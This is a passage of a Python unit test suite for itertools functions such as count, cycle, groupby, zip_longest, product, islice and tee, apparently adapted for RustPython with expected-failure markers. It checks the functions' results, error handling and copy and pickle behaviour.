self.assertEqual(repr(c), 'count(3, 5)')
next(c)
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
next(c)
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
next(c)
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values like 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
for j in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 1, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i, j))
if j == 1:
r2 = ('count(%r)' % i)
else:
r2 = ('count(%r, %r)' % (i, j))
self.assertEqual(r1, r2)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(i, j))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
# check copy, deepcopy, pickle
c = cycle('abc')
self.assertEqual(next(c), 'a')
#simple copy currently not supported, because __reduce__ returns
#an internal iterator
#self.assertEqual(take(10, copy.copy(c)), list('bcabcabcab'))
self.assertEqual(take(10, copy.deepcopy(c)), list('bcabcabcab'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('bcabcabcab'))
next(c)
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('cabcabcabc'))
next(c)
next(c)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cycle('abc'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# test with partial consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(2)] # consume 2 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# test with completely consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(7)] # consume 7 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle_setstate(self):
# Verify both modes for restoring state
# Mode 0 is efficient. It uses an incompletely consumed input
# iterator to build a cycle object and then passes in state with
# a list of previously consumed values. There is no data
# overlap between the two.
c = cycle('defg')
c.__setstate__((list('abc'), 0))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# Mode 1 is inefficient. It starts with a cycle object built
# from an iterator over the remaining elements in a partial
# cycle and then passes in state with all of the previously
# seen values (this overlaps values included in the iterator).
c = cycle('defg')
c.__setstate__((list('abcdefg'), 1))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# The first argument to setstate needs to be a tuple
with self.assertRaises(TypeError):
cycle('defg').__setstate__([list('abcdefg'), 0])
# The first argument in the setstate tuple must be a list
with self.assertRaises(TypeError):
c = cycle('defg')
c.__setstate__((tuple('defg'), 0))
take(20, c)
# The second argument in the setstate tuple must be an int
with self.assertRaises(TypeError):
cycle('defg').__setstate__((list('abcdefg'), 'x'))
self.assertRaises(TypeError, cycle('').__setstate__, ())
self.assertRaises(TypeError, cycle('').__setstate__, ([],))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check normal pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, testR):
for ik, ig in groupby(g, testR2):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested and pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for ik, ig in pickle.loads(pickle.dumps(groupby(g, testR2), proto)):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, testR)]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Check case where inner iterator is used after advancing the groupby
# iterator
s = list(zip('AABBBAAAA', range(9)))
it = groupby(s, testR)
_, g1 = next(it)
_, g2 = next(it)
_, g3 = next(it)
self.assertEqual(list(g1), [])
self.assertEqual(list(g2), [])
self.assertEqual(next(g3), ('A', 5))
list(it) # exhaust the groupby iterator
self.assertEqual(list(g3), [])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = groupby(s, testR)
_, g = next(it)
next(it)
next(it)
self.assertEqual(list(pickle.loads(pickle.dumps(g, proto))), [])
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.__next__ failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
# iter.__next__ failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.__next__ failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __eq__ failure
class DummyCmp:
def __eq__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
# __eq__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __eq__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filter(self):
self.assertEqual(list(filter(isEven, range(6))), [0,2,4])
self.assertEqual(list(filter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(filter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, filter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, filter)
self.assertRaises(TypeError, filter, lambda x:x)
self.assertRaises(TypeError, filter, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filter, isEven, 3)
self.assertRaises(TypeError, next, filter(range(6), range(6)))
# check copy, deepcopy, pickle
ans = [0,2,4]
c = filter(isEven, range(6))
self.assertEqual(list(copy.copy(c)), ans)
c = filter(isEven, range(6))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans)
next(c)
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans[1:])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filterfalse(self):
self.assertEqual(list(filterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(filterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(filterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, filterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, filterfalse)
self.assertRaises(TypeError, filterfalse, lambda x:x)
self.assertRaises(TypeError, filterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filterfalse, isEven, 3)
self.assertRaises(TypeError, next, filterfalse(range(6), range(6)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, filterfalse(isEven, range(6)))
def test_zip(self):
# XXX This test is rather silly now that the builtin zip() has replaced itertools.izip()...
ans = [(x,y) for x, y in zip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(zip('abc', range(6))), lzip('abc', range(6)))
self.assertEqual(list(zip('abcdef', range(3))), lzip('abcdef', range(3)))
self.assertEqual(take(3,zip('abcdef', count())), lzip('abcdef', range(3)))
self.assertEqual(list(zip('abcdef')), lzip('abcdef'))
self.assertEqual(list(zip()), lzip())
self.assertRaises(TypeError, zip, 3)
self.assertRaises(TypeError, zip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in zip('abc', 'def')],
lzip('abc', 'def'))
self.assertEqual([pair for pair in zip('abc', 'def')],
lzip('abc', 'def'))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_tuple_reuse(self):
ids = list(map(id, zip('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# check copy, deepcopy, pickle
ans = [(x,y) for x, y in copy.copy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
ans = [(x,y) for x, y in copy.deepcopy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(zip('abc',count()), proto))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
testIntermediate = zip('abc',count())
next(testIntermediate)
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(testIntermediate, proto))]
self.assertEqual(ans, [('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip('abc', count()))
def test_ziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
self.assertEqual(list(zip_longest(*args)), target)
self.assertEqual(list(zip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(zip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,zip_longest('abcdef', count())), list(zip('abcdef', range(3)))) # take 3 from infinite input
self.assertEqual(list(zip_longest()), list(zip()))
self.assertEqual(list(zip_longest([])), list(zip([])))
self.assertEqual(list(zip_longest('abcdef')), list(zip('abcdef')))
self.assertEqual(list(zip_longest('abc', 'defg', **{})),
list(zip(list('abc')+[None], 'defg'))) # empty keyword dict
self.assertRaises(TypeError, zip_longest, 3)
self.assertRaises(TypeError, zip_longest, range(3), 3)
for stmt in [
"zip_longest('abc', fv=1)",
"zip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise TypeError in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
self.assertEqual([pair for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_longest_tuple_reuse(self):
ids = list(map(id, zip_longest('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip_longest('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_zip_longest_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip_longest("abc", "def"))
self.pickletest(proto, zip_longest("abc", "defgh"))
self.pickletest(proto, zip_longest("abc", "defgh", fillvalue=1))
self.pickletest(proto, zip_longest("", "defgh"))
def test_zip_longest_bad_iterable(self):
exception = TypeError()
class BadIterable:
def __iter__(self):
raise exception
with self.assertRaises(TypeError) as cm:
zip_longest(BadIterable())
self.assertIs(cm.exception, exception)
def test_bug_7244(self):
class Repeater:
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def __next__(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code would fail in debug mode
# with an undetected error and StopIteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in zip_longest(r1, r2, fillvalue=0):
with support.captured_output('stdout'):
print((i, j))
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be lost
# and StopIteration would stop as expected
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = zip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_product(self):
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
def product1(*args, **kwds):
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', range(0), range(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_pickling(self):
# check copy, deepcopy, pickle
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(copy.copy(product(*args))), result)
self.assertEqual(list(copy.deepcopy(product(*args))), result)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, product(*args))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_issue_25021(self):
# test that indices are properly clamped to the length of the tuples
p = product((1, 2),(3,))
p.__setstate__((0, 0x1000)) # will access tuple element 1 if not clamped
self.assertEqual(next(p), (2, 3))
# test that empty tuple in the list will result in an immediate StopIteration
p = product((1, 2), (), (3,))
p.__setstate__((0, 0, 0x1000)) # will access tuple element 1 if not clamped
self.assertRaises(StopIteration, next, p)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(lzip(range(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
# check copy, deepcopy, pickle
c = repeat(object='a', times=10)
self.assertEqual(next(c), 'a')
self.assertEqual(take(2, copy.copy(c)), list('a' * 2))
self.assertEqual(take(2, copy.deepcopy(c)), list('a' * 2))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, repeat(object='a', times=10))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_map(self):
self.assertEqual(list(map(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(map(tupleize, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(map(tupleize, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,map(tupleize, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(map(operator.pow, [])), [])
self.assertRaises(TypeError, map)
self.assertRaises(TypeError, list, map(None, range(3), range(3)))
self.assertRaises(TypeError, map, operator.neg)
self.assertRaises(TypeError, next, map(10, range(5)))
self.assertRaises(ValueError, next, map(errfunc, [4], [5]))
self.assertRaises(TypeError, next, map(onearg, [4], [5]))
# check copy, deepcopy, pickle
ans = [('a',0),('b',1),('c',2)]
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.copy(c)), ans)
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = map(tupleize, 'abc', count())
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, zip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, starmap(10, [(4,5)]))
self.assertRaises(ValueError, next, starmap(errfunc, [(4,5)]))
self.assertRaises(TypeError, next, starmap(onearg, [(4,5)]))
# check copy, deepcopy, pickle
ans = [0**1, 1**2, 2**3]
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.copy(c)), ans)
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*args)))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*tgtargs)))
# Test stop=None
self.assertEqual(list(islice(range(10), None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), 2, None)), list(range(2, 10)))
self.assertEqual(list(islice(range(10), 1, None, 2)), list(range(1, 10, 2)))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test invalid arguments
ra = range(10)
self.assertRaises(TypeError, islice, ra)
self.assertRaises(TypeError, islice, ra, 1, 2, 3, 4)
self.assertRaises(ValueError, islice, ra, -5, 10, 1)
self.assertRaises(ValueError, islice, ra, 1, -5, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, 0)
self.assertRaises(ValueError, islice, ra, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1)
self.assertRaises(ValueError, islice, ra, 1, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1, 1)
self.assertRaises(ValueError, islice, ra, 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: leave islice() and its source iterator in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# check copy, deepcopy, pickle
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 3),
(20,)
]:
self.assertEqual(list(copy.copy(islice(range(100), *args))),
list(range(*args)))
self.assertEqual(list(copy.deepcopy(islice(range(100), *args))),
list(range(*args)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, islice(range(100), *args))
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
support.gc_collect()
self.assertIsNone(wr())
# Issue #30537: islice can accept integer-like objects as
# arguments
class IntLike(object):
def __init__(self, val):
self.val = val
def __index__(self):
return self.val
self.assertEqual(list(islice(range(100), IntLike(10))), list(range(10)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50))),
list(range(10, 50)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50), IntLike(5))),
list(range(10,50,5)))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, takewhile(10, [(4,5)]))
self.assertRaises(ValueError, next, takewhile(errfunc, [(4,5)]))
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, next, t)
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(takewhile(underten, data))), [1, 3, 5])
self.assertEqual(list(copy.deepcopy(takewhile(underten, data))),
[1, 3, 5])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, takewhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, dropwhile(10, [(4,5)]))
self.assertRaises(ValueError, next, dropwhile(errfunc, [(4,5)]))
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(dropwhile(underten, data))), [20, 2, 4, 6, 8])
self.assertEqual(list(copy.deepcopy(dropwhile(underten, data))),
[20, 2, 4, 6, 8])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, dropwhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee(self):
n = 200
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(lzip(a,b), lzip(range(n), range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), list(range(n)))
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in range(100):
self.assertEqual(next(a), i)
del a
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in range(100):
self.assertEqual(next(a), i)
del b
self.assertEqual(list(a), list(range(100, n)))
for j in range(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = next(its[i])
lists[i].append(value)
self.assertEqual(lists[0], list(range(n)))
self.assertEqual(lists[1], list(range(n)))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(range(2000), 3)
for i in range(100):
self.assertEqual(next(a), i)
self.assertEqual(list(b), list(range(2000)))
self.assertEqual([next(c), next(c)], list(range(2)))
self.assertEqual(list(a), list(range(100,2000)))
self.assertEqual(list(c), list(range(2,2000)))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in range(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual([list(x) for x in result], [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weak referencable
a, b = tee(range(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
self.assertRaises(ReferenceError, getattr, p, '__class__')
ans = list('abc')
long_ans = list(range(10000))
# check copy
a, b = tee('abc')
self.assertEqual(list(copy.copy(a)), ans)
self.assertEqual(list(copy.copy(b)), ans)
a, b = tee(list(range(10000)))
self.assertEqual(list(copy.copy(a)), long_ans)
self.assertEqual(list(copy.copy(b)), long_ans)
# check partially consumed copy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.copy(a)), ans[2:])
self.assertEqual(list(copy.copy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.copy(a)), long_ans[100:])
self.assertEqual(list(copy.copy(b)), long_ans[60:])
